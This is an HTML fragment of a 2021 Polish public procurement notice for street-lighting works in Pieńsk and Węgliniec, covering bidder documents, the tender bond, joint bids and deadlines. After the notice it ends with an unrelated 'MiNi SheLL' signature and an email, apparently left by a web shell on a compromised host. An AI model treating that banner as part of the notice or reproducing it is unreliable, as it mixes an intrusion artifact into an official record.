likwidacji, nie ogłoszono<br/>upadłości,jegoaktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jegodziałalnośćgospodarcza nie jest zawieszona ani nie znajduje się on winnej tego rodzajusytuacji<br/>wynikającej zpodobnej procedury przewidzianej w przepisach miejsca wszczęciatej procedury.<br/>Dokumenty powinnybyć wystawione nie wcześniej niż 3 miesięcy przedupływem terminu składania<br/>ofert.7. Jeżeli w kraju, wktórym wykonawca ma siedzibę lub miejsce zamieszkania lub<br/>miejscezamieszkania ma osoba, którejdokument dotyczy, nie wydaje się dokumentów, o którychmowa<br/>w pkt IX.4. ppkt.5, zastępuje się jeodpowiednio w całości lub w części dokumentemzawierającym<br/>odpowiednio oświadczenie wykonawcy,ze wskazaniem osoby albo osóbuprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, którejdokument miałdotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawca ma siedzibęlubmiejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przedorganemsądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowegolub gospodarczego,właściwym ze względu na siedzibę lub miejsce<br/>zamieszkaniawykonawcy. Dokumenty powinny byćwystawione nie wcześniej niż 3 miesięcy<br/>przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokument potwierdzający, że wykonawca jest ubezpieczony<br/>ododpowiedzialności cywilnejw zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówieniana sumęgwarancyjną nie mniejszą niż 3000 000,00 zł (słownie złotych: trzy miliony 00/100). <br/>2.Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeliokresprowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju,wartości,<br/>daty imiejsca wykonania oraz podmiotów, na rzecz których roboty te zostaływykonane, oraz<br/>załączeniemdowodów określających,czy te roboty budowlane zostaływykonane należycie, przy czym<br/>dowodami, októrych mowa, są referencje bądź innedokumenty sporządzone przez podmiot, na rzecz którego robotybudowlane zostaływykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest wstanieuzyskaćtych dokumentów – inne odpowiednie dokumenty.<br/>3. Wykazu osób, skierowanych przezwykonawcę do realizacji zamówienia publicznego,w szczególności odpowiedzialnych za<br/>świadczenieusług, kontrolę jakości lub kierowanierobotami budowlanymi, wraz z informacjami na temat<br/>ichkwalifikacji zawodowych,uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonaniazamówieniapublicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacjąopodstawie do dysponowania tymi osobami.4. Dokumentów dotyczących podmiotu<br/>trzeciego, w celuwykazania spełnienia, w zakresie,w jakim Wykonawca powołuje się na jego<br/>zasoby,warunków udziałuw postępowaniu jeżeliwykonawca polega na zasobach podmiotu trzeciego.<br/>Jeżeli z<br/>uzasadnionejprzyczynywykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowychśrodkówdowodowych, wykonawca składa inne podmiotowe środki dowodowe, którew<br/>wystarczającysposób potwierdzają spełnianie opisanego przez zamawiającego warunkuudziału w<br/>postępowaniu lubkryterium selekcji dotyczącego sytuacji ekonomicznej lubfinansowej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony f o r m u l a r z o f e r t y – załącznik do siwz2) Wykonawca dołącza<br/>doofertyoświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału<br/>wpostępowaniu wzakresie wskazanym w SWZ. Oświadczenie to stanowi dowód<br/>potwierdzającybrak podstawwykluczenia oraz spełnianie warunków udziału w postępowaniu, na<br/>dzieńskładaniaofert,tymczasowo zastępujący wymagane podmiotowe środki dowodowe,<br/>wskazanewSWZ.3)Oryginał pełnomocnictwa do działania w imieniu wykonawcy lub<br/>notarialniepotwierdzonyodpis pełnomocnictwa, w przypadku, gdy wykonawcę reprezentuje<br/>Pełnomocnik oile prawo dopodpisania oferty nie wynika z dokumentów, do których Zamawiający<br/>ma dostępbądź z innychdokumentów dołączonych do oferty. Treść pełnomocnictwa<br/>musijednoznacznie określaćczynności, co do wykonywania których pełnomocnik jest<br/>upoważniony. 4)Dowód wniesienia w adi u m z dopiskiem zawierającym oznaczenie<br/>postępowania oraz zokreśleniem sposobu zwrotuwadium;5) Pisemne zobowiązanie innych<br/>podmiotów do oddaniawykonawcy do dyspozycjiniezbędnych zasobów na potrzeby wykonania<br/>zamówienia - jeżeliwykonawca,zgodnie z art.125ust. 5 ustawy, polega na zdolnościach lub<br/>sytuacji innychpodmiotów, niezależnie od charakteruprawnego łączących go z nimi stosunków, o<br/>czym mowa wpunktach IX.6.1) – 7).6)W przypadkuwykonawców ubiegających się wspólnie o<br/>udzieleniezamówienia wykonawcy zobowiązani są doustanowienia pełnomocnika.<br/>Dokumentpełnomocnictwa, z którego treści będzie wynikałoumocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych wykonawcównależy załączyć<br/>dooferty.Pełnomocnictwo powinno być załączone do oferty i powinno zawieraćw<br/>szczególnościwskazanie:- postępowania o zamówienie publiczne, którego dotyczy,-wszystkich<br/>wykonawcówubiegających się wspólnie o udzielenie zamówienia wymienionych znazwy z<br/>określeniem adresusiedziby,- ustanowionego pełnomocnika oraz zakresu jegoumocowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 45 000,00 zł (słownie złotych: czterdzieści pięć tysięcy 00/100).<br/> 2. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/> 3. Wadium musi obejmować pełen okres związania ofertą.<br/> 4. Wadium musi być wniesione przed upływem terminu składania ofert.<br/> Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy: Bank Spółdzielczy w Pieńsku 60 8382 0001 0000 0202 2000 0060, z oznaczeniem: tryb podstawowy na zadanie pn: „Ograniczenie niskiej emisji poprzez przebudowę oświetlenia ulicznego i drogowego na terenie gmin partnerskich Pieńsk i Węgliniec”. Wadium musi być na koncie Zamawiającego przed upływem terminu składania ofert.<br/> 5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/> 1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym <br/>w gwarancji lub poręczeniu musi być Gmina Pieńsk,<br/> 2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/> 3) kwotę gwarancji/poręczenia,<br/> 4) termin ważności gwarancji/poręczenia,<br/> 5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/> 6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/> 7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/> 8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, wtakim<br/>przypadkuwykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniuo<br/>udzieleniezamówienia albo reprezentowania w postępowaniu i zawarcia umowy wsprawie<br/>zamówieniapublicznego. Do oferty należy załączyć pełnomocnictwo podpisaneprzez<br/>upoważnionychprzedstawicieli wszystkich pozostałych wykonawców w formie oryginału lubkopii<br/>poświadczonejza zgodność z oryginałem przez notariusza. Złożona oferta musi byćpodpisana w<br/>taki sposób,byprawnie zobowiązywała wszystkich wykonawców<br/>występującychwspólnie.Pełnomocnictwoskłada się w oryginale lub kopii poświadczonej<br/>notarialnie.2. Wodniesieniu do wymagańpostawionych przez Zamawiającego, każdy z<br/>wykonawcówwystępujących wspólnie musiudokumentować, że nie podlega wykluczeniu na<br/>podstawie art. 108ust. 1 i 2 oraz 109ust.1pkt.4,5,7-10 ustawy. Warunki udziału w postępowaniu<br/>określone w art. 112 ust. 2 pkt 2-3ustawyPZP (pkt VII SIWZ) musi spełniać co najmniej jeden<br/>wykonawcasamodzielnie lubwszyscy wykonawcy łącznie. 3. Wszelka korespondencja oraz<br/>rozliczeniadokonywane będąwyłącznie z pełnomocnikiem.4. Wykonawcy wspólnie ubiegający<br/>się oudzielenie zamówieniapublicznego ponoszą solidarną odpowiedzialność za wykonanie<br/>umowyoraz za szkody powstałez tytułu czynów niedozwolonych.5. Jeżeli oferta Wykonawców<br/>wspólnieubiegających się oudzielenie zamówienia, zostanie wybrana jako najkorzystniejsza,<br/>Zamawiającyzobowiązujewykonawców przed zawarciem umowy w sprawie zamówienia<br/>publicznego, doprzedłożeniaumowy regulującej współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami §14. 1 projektu umowy który stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia,zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP https://epuap.gov.pl/wps/portal iudostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-17 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-16 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com